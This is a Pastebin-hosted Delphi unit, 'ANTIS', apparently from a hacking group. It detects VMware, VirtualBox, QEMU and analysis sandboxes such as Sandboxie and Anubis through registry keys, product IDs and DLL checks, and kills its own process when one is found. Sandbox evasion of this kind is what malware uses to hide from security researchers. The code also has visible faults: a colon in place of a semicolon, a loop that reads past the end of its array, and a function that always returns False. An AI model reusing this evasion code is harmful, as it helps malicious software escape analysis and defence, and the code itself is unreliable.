document.write('
Data hosted with ♥ by Pastebin.com - Download Raw - See Original
  1. //******************************************************************************
  2. // Unit        : ANTIS
  3. // Autor       : Fakedo0r .:[PD-TEAM]:.
  4. // Fecha       : 04.04.2012
  5. // Modificacion: 12.08.2012
  6. // Creditos    : Cobein
  7. // Descripcion : Detecta [VirtualPC / VMWare / VirtualBox / Anubis]
  8. //               Detecta [Sandboxie / ThreatExpert / CWSandbox / JoeBox]
  9. // Uso         : Anti_End;
  10. //******************************************************************************
  11. Unit UNT_ANTIS;
  12. //******************************************************************************
  13. // DECLARACION DE CLASES
  14. //******************************************************************************
  15. Interface
  16.  
  17. Uses
  18.   Windows, ShlObj, Messages, SysUtils;
  19. //******************************************************************************
  20. // DECLARACION DE FUNCIONES / PROCEDIMIENTOS
  21. //******************************************************************************
  22. Function IsVirtualPCPresent: Bool;
  23. Function IsInSandbox: Bool;
  24. Function Anti_End: Bool;
  25. //******************************************************************************
  26. // FUNCIONES / PROCEDIMIENTOS
  27. //******************************************************************************
  28. Implementation
  29. //******************************************************************************
  30. //<--- [VirtualPC / VMWare / VirtualBox / Anubis] --->
  31. //******************************************************************************
  32. Function IsVirtualPCPresent: Bool;
  33. Const
  34.   sArrVM: Array [0 .. 3] Of String = (\'VIRTUAL\', \'VMWARE\', \'VBOX\', \'QEMU\');
  35. Var
  36.   hlKey:      HKEY;
  37.   sBuffer:    String;
  38.   sPathName:  String;
  39.   I:          Integer;
  40.   iRegType:   Integer;
  41.   iDataSize:  Integer;
  42. Begin
  43.   IsVirtualPCPresent := False;
  44.   iRegType := 1;
  45.   sPathName := \'SYSTEM\\ControlSet001\\Services\\Disk\\Enum\';
  46.  
  47.   If RegOpenKeyEx($80000002, PChar(sPathName), 0, $20019, hlKey) = 0 Then
  48.     If RegQueryValueEx(hlKey, \'0\', 0, @iRegType, Nil, @iDataSize) = 0 Then
  49.     Begin
  50.       SetLength(sBuffer, iDataSize);
  51.       RegQueryValueEx(hlKey, \'0\', 0, @iRegType,
  52.                       PByte(PChar(sBuffer)), @iDataSize);
  53.       For I := 0 To 3 Do
  54.         If AnsiPos(UpperCase(sArrVM[I]), UpperCase(Trim(sBuffer))) > 0 Then
  55.           IsVirtualPCPresent := True;
  56.     End;
  57.  
  58.   RegCloseKey(hlKey);
  59. End;
  60. //******************************************************************************
  61. //<--- SANDBOX [Sandboxie / ThreatExpert / CWSandbox / JoeBox] --->
  62. //******************************************************************************
  63. Function IsInSandbox: Bool;
  64. Const
  65.   sArrSB: Array [0 .. 1] Of String = (\'76487-644-3177037-23510\',
  66.                                       \'55274-640-2673064-23950\');
  67.   sArrDll: Array [0 .. 1] Of String = (\'sbiedll.dll\', \'dbghelp.dll\');
  68. Var
  69.   hlKey:      HKEY;
  70.   sBuffer:    String;
  71.   sPathName:  String;
  72.   I:          Integer;
  73.   hDll:       Integer;
  74.   iRegType:   Integer;
  75.   iDataSize:  Integer;
  76.   hSnapShot:  Integer;
  77. Begin
  78.   IsInSandbox := False;
  79.   iRegType := 1;
  80.   sPathName := \'Software\\Microsoft\\Windows\\CurrentVersion\':
  81.  
  82.   hDll := LoadLibrary(Pchar(sArrDll[0]));
  83.  
  84.   If hDll <> 0 Then
  85.     IsInSandbox := True;
  86.  
  87.   FreeLibrary(hDll);
  88.  
  89.   hDll := LoadLibrary(Pchar(sArrDll[1]));
  90.  
  91.   If hDll <> 0 Then
  92.     IsInSandbox := True;
  93.  
  94.   FreeLibrary(hDll);
  95.  
  96.   If RegOpenKeyEx($80000002, PChar(sPathName), 0, $20019, hlKey) = 0 Then
  97.     If RegQueryValueEx(hlKey, \'ProductId\', 0, @iRegType, Nil,
  98.                         @iDataSize) = 0 Then
  99.     Begin
  100.       SetLength(sBuffer, iDataSize);
  101.       RegQueryValueEx(hlKey, \'ProductId\', 0, @iRegType,
  102.                       PByte(PChar(sBuffer)), @iDataSize);
  103.  
  104.       For i := 0 To 2 Do
  105.         If AnsiPos(sArrSB[i], Trim(sBuffer)) > 0 Then
  106.           IsInSandbox := True;
  107.     End;
  108.  
  109.   RegCloseKey(hlKey);
  110. End;
  111. //******************************************************************************
  112. //<--- LLAMADA MAIN --->
  113. //******************************************************************************
  114. Function Anti_End: Bool;
  115. Begin
  116.   Anti_End := False;
  117.  
  118.   If IsVirtualPCPresent = True Or IsInSandbox = True Then
  119.     ExitProcess(0);
  120. End;
  121.  
  122. End.
');